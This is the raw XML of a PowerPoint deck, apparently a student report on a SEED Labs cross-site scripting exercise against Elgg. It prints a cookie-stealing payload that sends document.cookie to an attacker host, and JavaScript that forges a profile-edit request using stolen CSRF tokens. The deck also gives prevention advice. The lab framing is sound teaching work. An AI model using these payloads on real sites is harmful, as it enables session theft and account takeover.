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75" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="277" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="274" r:id="rId19"/>
    <p:sldId id="273" r:id="rId20"/>
    <p:sldId id="269" r:id="rId21"/>
    <p:sldId id="271" r:id="rId22"/>
    <p:sldId id="276" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="282" r:id="rId26"/>
    <p:sldId id="280" r:id="rId27"/>
    <p:sldId id="281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AE4-9188-47DD-B6D6-D48B3D5C5F4B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3F77E9-9852-403F-8D86-96EB86F297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AE4-9188-47DD-B6D6-D48B3D5C5F4B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77E9-9852-403F-8D86-96EB86F2976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3F77E9-9852-403F-8D86-96EB86F297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AE4-9188-47DD-B6D6-D48B3D5C5F4B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AE4-9188-47DD-B6D6-D48B3D5C5F4B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3F77E9-9852-403F-8D86-96EB86F297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AE4-9188-47DD-B6D6-D48B3D5C5F4B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3F77E9-9852-403F-8D86-96EB86F297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D061AE4-9188-47DD-B6D6-D48B3D5C5F4B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77E9-9852-403F-8D86-96EB86F297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AE4-9188-47DD-B6D6-D48B3D5C5F4B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3F77E9-9852-403F-8D86-96EB86F297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AE4-9188-47DD-B6D6-D48B3D5C5F4B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3F77E9-9852-403F-8D86-96EB86F297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AE4-9188-47DD-B6D6-D48B3D5C5F4B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3F77E9-9852-403F-8D86-96EB86F297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3F77E9-9852-403F-8D86-96EB86F297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AE4-9188-47DD-B6D6-D48B3D5C5F4B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3F77E9-9852-403F-8D86-96EB86F297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D061AE4-9188-47DD-B6D6-D48B3D5C5F4B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D061AE4-9188-47DD-B6D6-D48B3D5C5F4B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3F77E9-9852-403F-8D86-96EB86F297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.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elg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LAMP Stack and Elgg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 Site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Moving the script off the same machine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Start apache2 webserver on Kali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90800"/>
            <a:ext cx="7306695" cy="135273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Setup Apache on Kali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IP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33600"/>
            <a:ext cx="6601746" cy="24387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IP changes as through out our lab, because we had to restart our systems a few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running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" b="113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Cookies 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 sniff the cookie’s you have to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bake’m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> into your HTTP request first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7620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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>('&lt;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=http://192.168.0.172:80?c=' + escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) + ' &gt;');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Confirmed that the moved script is on our Kali Host.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00"/>
            <a:ext cx="6992326" cy="135273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Capturing the cookie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Alice’s cookie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" r="52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Using Wireshark to get the cookie.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Recapture of Alice’s Cookie after reboot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" r="23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Capturing http header info to allow for http header forgery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VM – Kali Linux and SEED Lab XSS Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Seed Lab - Ubuntu 12.04 LTS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kali 64bit Current version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS Lab has some things turned off that make this attack not work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Settings we wouldn’t have known about that would have made the project not work at all.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30192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HTTPLive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Headers Info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r="55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Find how Elgg passes HTTP headers to update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Live Headers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r="203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Header for adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Boby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scripts to forge a http header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562600"/>
            <a:ext cx="5867400" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript Code for Faking Headers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With help from the lab’s code skeleton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And a lot and lot of debugging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685800"/>
            <a:ext cx="556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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> Ajax=null;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> token="&amp;__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>elgg_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p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ts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>="&amp;__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>elgg_ts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> += "=" + elgg.security.token.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>elgg_ts;token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> += "=" + elgg.security.token.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>elgg_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>// Construct the header information for the HTTP request	Ajax=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Ajax.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>POST","http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>://www.xsslabelgg.com/action/profile/edit",true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Ajax.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Host","www.xsslabelgg.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Ajax.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("Keep-Alive","300");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Ajax.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Connection","keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>-alive");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Ajax.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("Cookie",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie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Ajax.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("Content-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Type","application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>// Construct the content. The format of the content can be learned // from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>LiveHTTPHeaders</a:t>
            </a:r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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> content="name=..&amp;description=...&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>guid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>=";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>// You need to fill in the details.	// Send the HTTP POST request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>content += "&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>guid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>elgg.page_owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>guid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>content += "&amp;name=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>elgg.page_owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>["name"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>window.alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(content);	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Ajax.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(content);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99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Firebug to Debug JS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6973273" cy="362000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Lots, lots, and lots of debugging…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Elgg Protections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Elgg Time Stamp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Elgg Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Both used to prevent HTTP requests not from the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Get the script to pass that info into the headers to overcome this issue.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 to update profile complete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" b="16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No errors, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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script working with cookie.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" b="95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Print out the HTTP header with Elgg Token and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>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Xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is not straight forward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javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not the first point of attack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Cross Site Scripting requires and understanding of many different types of scripting languages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PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requires knowledge of HTTP and network capture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It the first line of attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is the end result of other types of attacks first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requires a lot of time and a degree of skill</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110668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Elgg?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Elgg is a social media framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It lets site owners build a custom site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Training portals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Social media sites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Reduce information foot print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reduce Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pen test for leaking data via Google Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configure webservers to not leak data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This lab had a default test page for apache that could be used for information gathering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Harden the LAMP software stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Follow standardized check lists</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Have experienced people review code and servers for issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpspeicalchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to sanitize user input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ihack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> plug-in for Elgg to prevent script execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CAPTCHA could increase security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.acunetix.com/blog/articles/xss-http-headers/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441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Updating a system outdated Ubuntu 12.04 LTS would take a day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hiring people to review  the code, settings, and test the system normally starts about 4,000.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Experienced Pen testers make about 100,000+ per year.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180227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SEED labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Professor Wenliang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Du of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syracuse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Department of Electrical Engineering &amp; Computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Science</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elgg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Seed labs are a set of prebuild VM’s for hands on training and implementation of known security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The XSS lab was chosen because it has all the elements need and reduced the time needed to build a custom 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if the site is vulnerable to insertion of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Window.alert(“XSS”);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if the site is vulnerable to insertion of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Window.alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“You’ve been XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”);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successful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attempt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After many hours of trying and failing!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Put the code on the same machine using another virtual server of apache2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The loop back points to a test page for apache2.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9" r="193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02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running the code,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Success of inserting code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r="703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Step 1 complete:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prove code could be inserted into a page.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34817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cookie locally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6" r="950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wouldn’t get the attacker the cookie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108</TotalTime>
  <Words>685</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>123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Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Software Setup</vt:lpstr>
      <vt:lpstr>What is Elgg?</vt:lpstr>
      <vt:lpstr>SEED Lab</vt:lpstr>
      <vt:lpstr>Methods</vt:lpstr>
      <vt:lpstr>Method</vt:lpstr>
      <vt:lpstr>First successful attempt After many hours of trying and failing! </vt:lpstr>
      <vt:lpstr>Results of running the code, Success of inserting code</vt:lpstr>
      <vt:lpstr>Display the cookie locally</vt:lpstr>
      <vt:lpstr>Method</vt:lpstr>
      <vt:lpstr>Install and Start apache2 webserver on Kali</vt:lpstr>
      <vt:lpstr>Get the IP</vt:lpstr>
      <vt:lpstr>Its running</vt:lpstr>
      <vt:lpstr>Send Cookies Script</vt:lpstr>
      <vt:lpstr>Confirmed that the moved script is on our Kali Host.</vt:lpstr>
      <vt:lpstr>Method</vt:lpstr>
      <vt:lpstr>Capture Alice’s cookie</vt:lpstr>
      <vt:lpstr>Recapture of Alice’s Cookie after reboot</vt:lpstr>
      <vt:lpstr>Method</vt:lpstr>
      <vt:lpstr>HTTPLive Headers Info</vt:lpstr>
      <vt:lpstr>HTTP Live Headers</vt:lpstr>
      <vt:lpstr>Method</vt:lpstr>
      <vt:lpstr>JavaScript Code for Faking Headers</vt:lpstr>
      <vt:lpstr>Using Firebug to Debug JS</vt:lpstr>
      <vt:lpstr>Elgg Protections</vt:lpstr>
      <vt:lpstr>POST request to update profile complete</vt:lpstr>
      <vt:lpstr>Proof script working with cookie.</vt:lpstr>
      <vt:lpstr>Conclusions</vt:lpstr>
      <vt:lpstr>Conclusions</vt:lpstr>
      <vt:lpstr>Prevention</vt:lpstr>
      <vt:lpstr>Costs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Site Scripting</dc:title>
  <dc:creator>Dustin Watson</dc:creator>
  <cp:lastModifiedBy>Dustin Watson</cp:lastModifiedBy>
  <cp:revision>61</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-18T18:10:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-14T17:22:59Z</dcterms:modified>
</cp:coreProperties>
</file>